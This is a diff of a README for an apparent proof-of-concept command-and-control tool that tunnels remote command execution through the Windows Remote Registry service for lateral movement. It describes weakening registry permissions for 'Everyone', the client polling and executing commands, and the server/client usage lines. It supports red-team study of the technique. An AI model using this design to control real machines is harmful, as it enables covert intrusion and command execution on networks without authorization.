lassehauballe/EverythingCanBeAShell/README.md

 Since the traffic is based on RPC, it should only be suitable for lateral movement on local networks, however I have not tested it over the internet.

 ### How it works:
-1. When the server starts, the Remote Registry Service is enabled.
+1. When the server starts, the Remote Registry Service is enabled and started.
-2. The registry key HKEY_LOCAL_MACHINE\Software\RegistryC2\<user-defined name> is created along with the following registry values: cmd, output & sleep.
+2. The registry key HKEY_LOCAL_MACHINE\Software\RegistryC2\<user-defined> is created along with the following registry values: cmd, output & sleep.
-3. Permissions are then set for the user "Everyone" on the newly created registry key and, importantly, the registry key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg.
-This ensures that the client can authenticate to the server and has access to the relevant registry values.
-On exiting the server, the permissions are removed again.
+3. Permissions are then set for the user "Everyone" on the newly created registry key.
+4. Permissions are then likewise set on the key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg.
+This ensures that the client any client can authenticate to the server.
+(N.B.
+On exiting/closing of the server, these permissions are removed again.)
-4. The client will then check for the value at "sleep" to determine how often to check it.
+5. The client will then check the C2 server for the value of "sleep" to determine how often to check it.
-5. The client checks the "cmd" value at the server, executes it and writes the result to the output value on the server.
+6. The client then executes whatever command found in the "cmd"-value.
+7. The result of the command is written as a string to the C2's "output" value.
-6. While running, the server will look for new updates to the "output" value and prints it back to the attacker.
+8. While running, the server will look for new updates to the "output" value and prints it back to the attacker.

 ### Usage:
 **Setup the server (listener):**
 ```
 RegC2Server.exe <Unique Registry key name to use>
-RegC2Server.exe dc01
+RegC2Server.exe victim01
 ```
 **Client-side:**
 ```
-RegC2Client.exe <host> <Registry name to use>
+RegC2Client.exe <host> <Registry name used to start the server>
-RegC2Client.exe dc01 ws01
+RegC2Client.exe ws01 victim01
 ```

 **Since this is a POC, only the following commands have been implemented:**
 ```
 >help
 sleep <int>      Set the sleep time to the value of int
-cmd <cmd>        cmd to execute
+cmd <command>    cmd to execute
 exit             Exit the application gracefully
 ```